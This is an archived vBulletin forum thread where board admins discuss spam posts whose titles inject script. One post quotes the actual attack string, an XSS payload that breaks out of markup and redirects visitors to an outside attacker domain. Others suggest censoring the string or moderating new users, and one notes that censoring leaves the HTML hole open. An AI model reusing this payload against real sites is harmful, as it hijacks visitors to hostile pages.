The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
#11
|
|||
|
|||
Have you let cyb know ???
|
#12
|
|||
|
|||
i posted it in his thread....for this hack I mean...i dind't PM him or anything though
-------------- AHHHH!!! someone tried it AGAIN while i was sitting there blocking everything. luckily i disabled the plugin and nothing happened, but here's the line of text they used this time...i'm a lil scared to find out what that would have done, since it was executing a script file: Code:
">"">>>><script>location="http://intikam.us/hck"</script> """" > |
#13
|
|||
|
|||
You need to delete the Thread title when deleting the post... Edit it and make it so that the redirect isn't there anymore and this will end your admin being redirected. Somewhere you have HTML on...
|
#14
|
|||
|
|||
I've had this happen as well. What I don't understand is why people even bother doing this? It's the stupidest thing. What an enormous waste of their time to search out all these boards, register and then post this stupid title. All a person has to do is delete the stupid post and it's fixed. <sarcasm>Wow, those hackers are pretty smart, I know I'm impressed. </sarcasm> *rolling eyes* Sorry, just needed to rant there for a second about these little twits making our lives more difficult.
Anyway, I found a thread on here the other day about this where someone suggested to add that string they are using to the list of censored words and so I did that since it seemed like the quickest way to deal with this. So far, that has worked like a charm. I had one this morning actually, it ended up being a few of these ">"">> and then a whole bunch of these ************. So, it didn't work for them. Hehe. |
#15
|
|||
|
|||
Just moderate new users. They post as soon as they have activated the email, so the posts end up in a moderation queue. Then all you have to do is delete
Adding words to a censored list will only stop this variant of attack, it wont stop html being used in the first place - therefore the vulnerability is still open !!!!!! |
#16
|
|||
|
|||
Quote:
|
#17
|
||||
|
||||
What if you add html phrases to your censors. Example maybe html, .exe, ect... That might actually work. I found the best way to stop stuff like this is set user registration to admin and pay attention to their email address if it looks fishy dont activate their account.
|
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|